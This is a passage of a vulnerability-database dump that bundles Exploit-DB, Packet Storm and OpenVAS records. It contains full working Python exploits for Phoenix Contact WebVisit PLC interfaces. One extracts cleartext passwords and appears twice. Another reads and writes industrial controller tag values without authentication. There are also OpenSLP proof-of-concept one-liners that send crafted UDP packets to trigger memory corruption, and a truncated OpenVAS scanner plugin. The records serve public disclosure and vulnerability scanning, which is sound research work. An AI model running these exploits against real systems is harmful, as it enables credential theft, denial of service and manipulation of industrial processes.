passwords are SHA256 hashes, which also will be retrieved \n \n# Sample output: \n# C:\\Users\\admin\\Desktop>CVE-2016-8366.py \n# Please enter an IP [192.168.1.200]: \n# This is the password for userlevel 1: pw1 \n# This is the password for userlevel 2: SuperPass2 \n# This is the password for userlevel 3: Extreme2TheMax3 \n# This is the password for userlevel 4: PowerPass4 \n# Press Enter to exit \n \n# PoC \n \n#! /usr/bin/env python \n \nimport urllib2, binascii \n \nstrIP = raw_input('Please enter an IP [192.168.1.200]: ') \nif strIP == '': strIP = '192.168.1.200' \n \ntry: \nURLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/')) \nexcept urllib2.HTTPError: \nprint('#### Critical Error with IP ' + strIP + ': no response') \nraw_input('Press Enter to exit') \nexit() \n \nstrMainTEQ = '' \nfor line in URLResponse.readlines(): \nif 'MainTEQName' in line: \nstrMainTEQ = line.split('VALUE=\"')[1].split('\"')[0] \n \nif strMainTEQ == '': \nprint('#### Error, no \\'MainTEQ\\' found on the main page') \nraw_input('Press Enter to exit') \nexit() \n \ntry: \nLoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ)) \nexcept urllib2.HTTPError: \nprint('Critical Error with IP ' + strIP + ': File \\'' + strMainTEQ + '\\' not found') \nraw_input('Press Enter to exit') \nexit() \nstrAlldata = '' \nfor line in LoginTeqResponse.readlines(): \nstrAlldata += binascii.hexlify(line) \n \n## For vulnerable webvisit: \n## Seems to be 'userLevel' + x bytes + 1 + y bytes + 'password' \n## userLevel + '0506030001' + 31 + '00030003010301068300' + passlength + 'password' \n## For WebVisit > 6.40.00 \n## userLevel + '0003000301030b06830040' + 'SHA256' (wich is 64 bytes) \n \narrData = strAlldata.split('757365724c6576656c0506030001') ## userLevel + '0506030001' \nfor item in arrData: \nif '00030003010301068300' in item: \nintUserlevel = int(binascii.unhexlify(item[:2]), 16) ## Turn str '31' into int 1 \nstrPassLength = item.split('00030003010301068300')[1][:2] \nstrPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))]) \nprint('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword) \nelif '0003000301030b06830040' in item: \nintUserlevel = int(binascii.unhexlify(item[:2]), 16) \nstrHash = binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2]) \nprint('This is the hash for userlevel ' + str(intUserlevel) + ': ' + strHash.lower()) \nraw_input('Press Enter to exit') \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149763/phoenixcontactwebvisit64000-disclose.txt"}], "exploitdb": [{"lastseen": "2018-11-30T12:31:27", "bulletinFamily": "exploit", "description": "", "modified": "2018-11-07T00:00:00", "published": "2018-11-07T00:00:00", "id": "EDB-ID:45804", "href": "https://www.exploit-db.com/exploits/45804", "type": "exploitdb", "title": "OpenSLP 2.0.0 - Multiple Vulnerabilities", "sourceData": "\r\n _ _ \r\n / | ___ ___ ___ ___ ___| |___ \r\n _ / / | . | . | -_| |_ -| | . |\r\n|_|_/ |___| _|___|_|_|___|_| _|\r\n |_| |_| \r\n\r\n2018-11-07\r\n\r\nMORE BUGS IN OPENSLP-2.0.0\r\n==========================\r\n\r\nI discovered some bugs in openslp-2.0.0 back in January, 2018. \r\nOne of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free),\r\nand today I'm disclosing two more.\r\n\r\n\r\nBUG 1\r\n=====\r\n\r\nThis issue is an OOB read that does not crash the application.\r\nSo in terms of exploitation it is not very interesting. If that's what\r\nyou're here for then scroll down to bug#2.\r\nAfter the occurence of the bug the application actually detects the error\r\nand ignores the malicious packet. Therefore, it could be argued that this\r\nis not a bug at all. Nevertheless, here it is:\r\n\r\nProof of concept exploit:\r\n\r\n echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d > /dev/udp/127.0.0.1/427\r\n\r\nValgrind report:\r\n\r\n ==27968== Invalid read of size 1\r\n ==27968== at 0x412436: GetUINT16 (slp_message.c:63)\r\n ==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327)\r\n ==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005)\r\n ==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393)\r\n ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)\r\n ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)\r\n ==27968== by 0x40256B: main (slpd_main.c:699)\r\n ==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd\r\n ==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n ==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67)\r\n ==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139)\r\n ==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383)\r\n ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)\r\n ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)\r\n ==27968== by 0x40256B: main (slpd_main.c:699)\r\n\r\nAnalysis:\r\n\r\nv2ParseSrvReg is responsible for parsing incoming requests. Various bytes\r\nare read from the packet and interpreted as integers used as length fields.\r\nOne of them is the scopelistlen, parsed on line 321, and further used as\r\nargument for the amount of bytes to increment the buffer->curpos pointer\r\nin the the GetStrPtr function, shown below on line 112. It now points to\r\nuninitialized memory.\r\n\r\nThe OOB read occurs in GetUINT16, called on line 327 where the buffer->curpos \r\npointer is dereferenced.\r\n\r\nSubsequently the comparison on line 329 evaluates to true since the\r\nbuffer->curpos now points to memory located after the buffer->end\r\npointer. The application therefore stops processing the malicious packet.\r\n\r\n 291 static int v2ParseSrvReg(SLPBuffer buffer, SLPSrvReg * srvreg)\r\n 292 {\r\n 293 int result;\r\n 294\r\n 295 /* 0 1 2 3\r\n 296 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\r\n 297 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 298 | <URL-Entry> \\\r\n 299 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 300 | length of service type string | <service-type> \\\r\n 301 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 302 | length of <scope-list> | <scope-list> \\\r\n 303 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 304 | length of attr-list string | <attr-list> \\\r\n 305 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 306 |# of AttrAuths |(if present) Attribute Authentication Blocks...\\\r\n 307 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */\r\n 308\r\n 309 /* Parse the <URL-Entry>. */\r\n 310 result = v2ParseUrlEntry(buffer, &srvreg->urlentry);\r\n 311 if (result != 0)\r\n 312 return result;\r\n 313\r\n 314 /* Parse the <service-type> string. */\r\n 315 srvreg->srvtypelen = GetUINT16(&buffer->curpos);\r\n 316 srvreg->srvtype = GetStrPtr(&buffer->curpos, srvreg->srvtypelen);\r\n 317 if (buffer->curpos > buffer->end)\r\n 318 return SLP_ERROR_PARSE_ERROR;\r\n 319\r\n 320 /* Parse the <scope-list> string. */\r\n 321 srvreg->scopelistlen = GetUINT16(&buffer->curpos);\r\n 322 srvreg->scopelist = GetStrPtr(&buffer->curpos, srvreg->scopelistlen);\r\n 323 if (buffer->curpos > buffer->end)\r\n 324 return SLP_ERROR_PARSE_ERROR;\r\n 325\r\n 326 /* Parse the <attr-list> string. */\r\n 327 srvreg->attrlistlen = GetUINT16(&buffer->curpos);\r\n 328 srvreg->attrlist = GetStrPtr(&buffer->curpos, srvreg->attrlistlen);\r\n 329 if (buffer->curpos > buffer->end)\r\n 330 return SLP_ERROR_PARSE_ERROR;\r\n \r\n 54 /** Extract a 16-bit big-endian buffer value into a native 16-bit word.\r\n 55 *\r\n 56 * @param[in,out] cpp - The address of a pointer from which to extract.\r\n 57 *\r\n 58 * @return A 16-bit unsigned value in native format; the buffer pointer\r\n 59 * is moved ahead by 2 bytes on return.\r\n 60 */\r\n 61 uint16_t GetUINT16(uint8_t ** cpp)\r\n 62 {\r\n 63 uint16_t rv = AS_UINT16(*cpp);\r\n 64 *cpp += 2;\r\n 65 return rv;\r\n 66 }\r\n ...\r\n 96 /** Extract a string buffer address into a character pointer.\r\n 97 *\r\n 98 * Note that this routine doesn't actually copy the string. It only casts\r\n 99 * the buffer pointer to a character pointer and moves the value at @p cpp\r\n 100 * ahead by @p len bytes.\r\n 101 *\r\n 102 * @param[in,out] cpp - The address of a pointer from which to extract.\r\n 103 * @param[in] len - The length of the string to extract.\r\n 104 *\r\n 105 * @return A pointer to the first character at the address pointed to by\r\n 106 * @p cppstring pointer; the buffer pointer is moved ahead by @p len bytes\r\n 107 * on return.\r\n 108 */\r\n 109 char * GetStrPtr(uint8_t ** cpp, size_t len)\r\n 110 {\r\n 111 char * sp = (char *)*cpp;\r\n 112 *cpp += len;\r\n 113 return sp;\r\n 114 }\r\n\r\n\r\nProof of discovery: \r\n\r\n $ echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d | sha256sum\r\n 0d3f7a6e45a59def9097db4f103f95e4af2560bdb25853f9ee1c2e758c7d4946 -\r\n\r\ntwitter.com/magnusstubman/status/953909628622069760\r\n\r\n\r\nPatch:\r\n\r\nI'm not aware of any patch, and I'm not sure the maintainers are going to patch it.\r\n\r\nBUG 2\r\n=====\r\n\r\nFirst and foremost, I'm not claiming credit for this bug since it was\r\napparently discovered by Reno Robert and publicly disclosed on the\r\noss-security mailing list on 2016-09-27 and awarded CVE-2016-7567\r\nthe day after.\r\n\r\nopenwall.com/lists/oss-security/2016/09/27/4\r\nopenwall.com/lists/oss-security/2016/09/28/1\r\n\r\nAnyhow, I wasn't aware of the issue and found it by fuzzing, so I\r\nreported it to the maintainers who made me aware of the earlier discovery.\r\nWhat puzzled me was that no announcement had been made and the fact that\r\nthe latest stable version on their website is still vulnerable! I found it\r\n2017-12-06 and reported it 2018-01-18. See further down for proof of\r\ndiscovery.\r\n\r\nI havn't been able to find any exploit for this bug anywhere. Therefore,\r\nI'm today disclosing a proof-of-concept exploit for the bug to increase\r\nattention on the issue.\r\n\r\nExploit:\r\n\r\n echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d > /dev/udp/127.0.0.1/427\r\n\r\nValgrind report:\r\n\r\n ==56913== Invalid write of size 1\r\n ==56913== at 0x4C2D6A3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:914)\r\n ==56913== by 0x40FD0B: SLPFoldWhiteSpace (slp_compare.c:210)\r\n ==56913== by 0x4100DC: SLPCompareString (slp_compare.c:374)\r\n ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)\r\n ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)\r\n ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)\r\n ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)\r\n ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)\r\n ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)\r\n ==56913== by 0x402383: main (slpd_main.c:699)\r\n ==56913== Address 0x5b5dd06 is 0 bytes after a block of size 6 alloc'd\r\n ==56913== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n ==56913== by 0x415C51: _xmemdup (slp_xmalloc.c:356)\r\n ==56913== by 0x410096: SLPCompareString (slp_compare.c:365)\r\n ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)\r\n ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)\r\n ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)\r\n ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)\r\n ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)\r\n ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)\r\n ==56913== by 0x402383: main (slpd_main.c:699)\r\n\r\nThe while loop on line 207 fails to perform bounds checking, and as such\r\nmay end up incrementing the pointer p up to a point such that p is bigger\r\nthan ep. Thus, the third argument to memmove on line 2010 becomes negative.\r\nHowever, since memmove accepts a size_t (which is unsigned) the value wraps\r\naround and becomes UINT_MAX or close to UINT_MAX resulting in memmove\r\nattempting to move an excessive amount of memory, resulting in OOB write.\r\n\r\n 184 /** fold internal white space within a string.\r\n 185 *\r\n 186 * folds all internal white space to a single space character within a\r\n 187 * specified string. modified the @p str parameter with the result and\r\n 188 * returns the new length of the string.\r\n 189 *\r\n 190 * @param[in] len - the length in bytes of @p str.\r\n 191 * @param[in,out] str - the string from which extraneous white space\r\n 192 * should be removed.\r\n 193 *\r\n 194 * @return the new (shorter) length of @p str.\r\n 195 *\r\n 196 * @note this routine assumes that leading and trailing white space have\r\n 197 * already been removed from @p str.\r\n 198 */\r\n 199 static int slpfoldwhitespace(size_t len, char * str)\r\n 200 {\r\n 201 char * p = str, * ep = str + len;\r\n 202 while (p < ep)\r\n 203 {\r\n 204 if (isspace(*p))\r\n 205 {\r\n 206 char * ws2p = ++p; /* point ws2p to the second ws char. */\r\n 207 while (isspace(*p)) /* scan till we hit a non-ws char. */\r\n 208 p++;\r\n 209 len -= p - ws2p; /* reduce the length by extra ws. */\r\n 210 memmove(ws2p, p, ep - p); /* overwrite the extra white space. */\r\n 211 }\r\n 212 p++;\r\n 213 }\r\n 214 return (int)len;\r\n 215 }\r\n\r\nProof of discovery:\r\n\r\n $ echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d | sha256sum\r\n 5bba9f9410bd4dffa4dc119477153002002db3fdd26a97080e43bfd95aeadb24 -\r\n\r\ntwitter.com/magnusstubman/status/938317849474555904\r\n\r\nPatch: sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a \r\n\r\nREFERENCES\r\n==========\r\n\r\n- sourceforge.net/p/openslp/bugs/161\r\n- sourceforge.net/p/openslp/bugs/160\r\n- twitter.com/magnusstubman/status/938317849474555904\r\n- twitter.com/magnusstubman/status/953909628622069760\r\n- sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a\r\n- openwall.com/lists/oss-security/2016/09/27/4\r\n- openwall.com/lists/oss-security/2016/09/28/1", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45804"}, {"lastseen": "2018-10-12T14:30:07", "bulletinFamily": "exploit", "description": "Phoenix Contact WebVisit 2985725 - Authentication Bypass. CVE-2016-8371,CVE-2016-8380. Webapps exploit for Windows platform", "modified": "2018-10-12T00:00:00", "published": "2018-10-12T00:00:00", "id": "EDB-ID:45590", "href": "https://www.exploit-db.com/exploits/45590/", "type": "exploitdb", "title": "Phoenix Contact WebVisit 2985725 - Authentication Bypass", "sourceData": "# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass\r\n# Date: 2018-09-30\r\n# Exploit Author: Deneut Tijl\r\n# Vendor Homepage: www.phoenixcontact.com\r\n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5\r\n# Version: WebVisit (all versions)\r\n# CVE : CVE-2016-8380, CVE-2016-8371\r\n\r\n# Description\r\n# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection)\r\n# Steps:\r\n# * Get Project Name: http://<ip>/\r\n# * Get list of tags: http://<ip>/<projectname>.tcr\r\n# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe\r\n# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!)\r\n\r\n# CVE-2016-8380-SetPLCValues.py\r\n\r\n#! /usr/bin/env python\r\n\r\nimport urllib2\r\n\r\nstrIP = raw_input('Please enter an IP [192.168.1.200]: ')\r\nif strIP == '': strIP = '192.168.1.200'\r\n\r\ntry:\r\n URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': no response')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\nstrProject = ''\r\nfor line in URLResponse.readlines():\r\n if 'ProjectName' in line:\r\n strProject = line.split('VALUE=\"')[1].split('\"')[0]\r\n\r\nif strProject == '':\r\n print('#### Error, no \\'ProjectName\\' found on the main page')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\nprint('---- Found project \\'' + strProject + '\\', retrieving list of tags')\r\n\r\ntry:\r\n TagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\narrTagList = []\r\nfor line in TagResponse.readlines():\r\n if line.startswith('#!-- N ='):\r\n intNumberOfTags = int(line.split('=')[1])\r\n print('---- There should be ' + str(intNumberOfTags) + ' tags:')\r\n if not line.startswith('#'):\r\n if not line.split(';')[0].strip() == '':\r\n arrTagList.append(line.split(';')[0].strip())\r\n print('-- '+line.split(';')[0].strip())\r\n\r\n\r\nraw_input('Press Enter to query them all')\r\nimport os, urllib\r\nos.system('cls' if os.name == 'nt' else 'clear')\r\nstrPost = '<body>'\r\nstrPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>'\r\nstrPost += '<item_list>'\r\nfor item in arrTagList:\r\n strPost += '<i><n>' + item + '</n></i>'\r\nstrPost += '</item_list></body>'\r\nDataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read()\r\n\r\narrData = []\r\nfor item in DataResponse.split('<i>'):\r\n if '<n>' in item:\r\n name = item.split('<n>')[1].split('</n>')[0]\r\n value = item.split('<v>')[1].split('</v>')[0]\r\n arrData.append((name,value))\r\nprint('----- Full list of tags and their values:')\r\ni = 0\r\nfor item in arrData:\r\n i += 1\r\n print(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1])\r\n\r\nans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ')\r\nif ans1 == '':\r\n exit()\r\nstrTag = arrData[int(ans1) - 1][0]\r\nstrVal = arrData[int(ans1) - 1][1]\r\nans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ')\r\nif ans2 == '': ans2 = strVal\r\nurllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' + urllib.quote_plus(strTag) + '+' + str(ans2)))", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45590/"}, {"lastseen": "2018-10-11T16:29:59", "bulletinFamily": "exploit", "description": "Phoenix Contact WebVisit 6.40.00 - Password Disclosure. CVE-2016-8366. Webapps exploit for Hardware platform", "modified": "2018-10-11T00:00:00", "published": "2018-10-11T00:00:00", "id": "EDB-ID:45586", "href": "https://www.exploit-db.com/exploits/45586/", "type": "exploitdb", "title": "Phoenix Contact WebVisit 6.40.00 - Password Disclosure", "sourceData": "# Exploit Title: Phoenix Contact WebVisit 6.40.00 - Password Disclosure\r\n# Exploit Author: Deneut Tijl\r\n# Date: 2018-09-30\r\n# Vendor Homepage: www.phoenixcontact.com\r\n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5\r\n# Version: WebVisit < 6.40.00\r\n# CVE: CVE-2016-8366\r\n\r\n# This script will perform retrieval of clear text credentials for a Phoenix Contact PLC with a WebVisit GUI, \r\n# password protected, application on it Tested on the Phoenix Contact ILC-390 PLC, but others are \r\n# surely equally vulnerable with WebVisit 6.40.00, the passwords are SHA256 hashes, which also will be retrieved\r\n\t\t\r\n# Sample output:\r\n# C:\\Users\\admin\\Desktop>CVE-2016-8366.py\r\n# Please enter an IP [192.168.1.200]:\r\n# This is the password for userlevel 1: pw1\r\n# This is the password for userlevel 2: SuperPass2\r\n# This is the password for userlevel 3: Extreme2TheMax3\r\n# This is the password for userlevel 4: PowerPass4\r\n# Press Enter to exit\r\n\r\n# PoC\r\n\r\n#! /usr/bin/env python\r\n\r\nimport urllib2, binascii\r\n\r\nstrIP = raw_input('Please enter an IP [192.168.1.200]: ')\r\nif strIP == '': strIP = '192.168.1.200'\r\n\r\ntry:\r\n URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': no response')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\nstrMainTEQ = ''\r\nfor line in URLResponse.readlines():\r\n if 'MainTEQName' in line:\r\n strMainTEQ = line.split('VALUE=\"')[1].split('\"')[0]\r\n\r\nif strMainTEQ == '':\r\n print('#### Error, no \\'MainTEQ\\' found on the main page')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\ntry:\r\n LoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ))\r\nexcept urllib2.HTTPError:\r\n print('Critical Error with IP ' + strIP + ': File \\'' + strMainTEQ + '\\' not found')\r\n raw_input('Press Enter to exit')\r\n exit()\r\nstrAlldata = ''\r\nfor line in LoginTeqResponse.readlines():\r\n strAlldata += binascii.hexlify(line)\r\n\r\n## For vulnerable webvisit:\r\n## Seems to be 'userLevel' + x bytes + 1 + y bytes + 'password'\r\n## userLevel + '0506030001' + 31 + '00030003010301068300' + passlength + 'password'\r\n## For WebVisit > 6.40.00\r\n## userLevel + '0003000301030b06830040' + 'SHA256' (wich is 64 bytes)\r\n\r\narrData = strAlldata.split('757365724c6576656c0506030001') ## userLevel + '0506030001'\r\nfor item in arrData:\r\n if '00030003010301068300' in item:\r\n intUserlevel = int(binascii.unhexlify(item[:2]), 16) ## Turn str '31' into int 1\r\n strPassLength = item.split('00030003010301068300')[1][:2]\r\n strPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))])\r\n print('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword)\r\n elif '0003000301030b06830040' in item:\r\n intUserlevel = int(binascii.unhexlify(item[:2]), 16)\r\n strHash = binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2])\r\n print('This is the hash for userlevel ' + str(intUserlevel) + ': ' + strHash.lower())\r\nraw_input('Press Enter to exit')", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/45586/"}], "openvas": [{"lastseen": "2019-05-29T18:33:13", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4457129", "modified": "2019-05-03T00:00:00", "published": "2018-09-12T00:00:00", "id": "OPENVAS:1361412562310814003", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814003", "title": "Microsoft Windows Multiple Vulnerabilities (KB4457129)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4457129)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814003\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-5391\", \"CVE-2018-8271\", \"CVE-2018-8315\", \"CVE-2018-8332\",\n \"CVE-2018-8335\", \"CVE-2018-8392\", \"CVE-2018-8393\", \"CVE-2018-8410\",\n \"CVE-2018-8419\", \"CVE-2018-8420\", \"CVE-2018-8424\", \"CVE-2018-8433\",\n \"CVE-2018-8434\", \"CVE-2018-8438\", \"CVE-2018-8439\", \"CVE-2018-8440\",\n \"CVE-2018-8442\", \"CVE-2018-8443\", \"CVE-2018-8444\", \"CVE-2018-8446\",\n \"CVE-2018-8447\", \"CVE-2018-8452\", \"CVE-2018-8455\", \"CVE-2018-8457\",\n \"CVE-2018-8468\", \"CVE-2018-8470\", \"CVE-2018-8475\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-09-12 10:20:08 +0530 (Wed, 12 Sep 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4457129)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4457129\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Denial of service vulnerability (named 'FragmentSmack').\n\n - Windows bowser.sys kernel-mode driver fails to properly handle objects\n in memory.\n\n - Browser scripting engine improperly handle object types.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - SMB improperly handles specially crafted client requests.\n\n - Microsoft JET Database Engine improperly handles objects in memory.\n\n - Windows Kernel API improperly handles registry objects in memory.\n\n - Windows kernel fails to properly initialize a memory address.\n\n - Microsoft XML Core Services improperly MSXML parser processes user input.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows Graphics component improperly handles objects in memory.\n\n - Hyper-V improperly validates guest operating system user input.\n\n - Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - Windows kernel improperly handles objects in memory.\n\n - Microsoft Server Message Block 2.0 (SMBv2) server improperly handles certain\n requests.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Scripting engine does not properly handle objects in memory in Microsoft browsers.\n\n - Windows improperly parses files.\n\n - Internet Explorer improperly handles script.\n\n - Windows does not properly handle specially crafted image files.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code in the context of the current user, obtain information\n to further compromise the user's system, gain elevated privileges on a targeted\n system and also cause the affected system to crash.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 8.1 for 32-bit/x64.\n\n Microsoft Windows Server 2012 R2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4457129\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"urlmon.dll\");\nif(!fileVer){\n 